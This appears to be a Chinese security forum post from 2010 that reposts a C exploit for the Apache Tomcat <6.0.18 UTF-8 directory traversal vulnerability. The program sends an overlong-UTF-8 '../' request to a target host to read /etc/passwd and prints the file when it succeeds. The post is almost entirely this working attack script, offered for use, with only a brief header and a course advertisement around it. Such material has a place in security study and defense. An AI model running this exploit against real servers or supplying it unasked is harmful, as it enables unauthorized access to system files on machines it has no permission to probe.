-
-
[推荐]Apache Tomcat <6.0.18 UTF8的目录遍历漏洞
-
发表于:
2010-7-28 23:46
4951
-
[推荐]Apache Tomcat <6.0.18 UTF8的目录遍历漏洞
not so good but worth to try if our target directory structure has /usr/local/wwwroot
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <string.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#define EXPLOIT "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.0\n\n"
#define RCVBUFSIZE 9999
#define tester "root:x"
void cls()
{
char esc = 27;
printf("%c%s",esc,"[2J");
printf("%c%s",esc,"[1;1H");
}
int main(int argc,char **argv)
{
if(argc<2)
{
/**checking argument to avoid memory wasting for useless variables in vma**/
cls();
printf("\nApache Tomcat < 6.0.18 UTF8 Directory Traversal Vulnerability get /etc/passwd Exploit\n");
printf("\nc0d3r: mywisdom\n");
printf("\nusage:./tomcatevil hotname\n");
exit(1);
}
else
{
int port=80;
char echobuf[RCVBUFSIZE];
int rval,sockfd, bytesrcv, totalbytes;
struct hostent *he;
struct sockaddr_in their_addr;
if((he=gethostbyname(argv[1])) == NULL)
{
perror("\nSorry please recheck your target hostname !\n");
exit(1);
}
else
{
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket()");
exit(1);
}
else
{
//exploiting and try to get /etc/passwd
their_addr.sin_family = AF_INET;
printf("\n[-]Checking whether port %d opens or not\n",port);
their_addr.sin_port = htons(port);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8);
if(connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
{
perror("failed to connect !!!");
}
else
{
printf("\n[+]Port 80 opens !!! now sending your exploit to our target\n");
if(send(sockfd, EXPLOIT,999,0)==-1)
{
perror ("send");
}
else
{
totalbytes=0;
while (totalbytes < RCVBUFSIZE)
{
if ((bytesrcv = recv(sockfd, echobuf, RCVBUFSIZE - 1, 0)) <= 0)
{
}
else
{
totalbytes += bytesrcv;
echobuf[bytesrcv] = '\0';
}
totalbytes++;
}
}
if(echobuf)
{
rval=strstr (echobuf, tester);
if(rval)
{
printf(echobuf);
printf("\n[+]w00t!!! target vulnerable! exploitation success u may see /etc/passwd above !!!\n");
exit(1);
}
else
{
printf(echobuf);
printf("\n[-]target not vulnerable !!!\n");
exit(1);
}
}
}
close(sockfd);
//eof exploiting
}
}
}
}
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
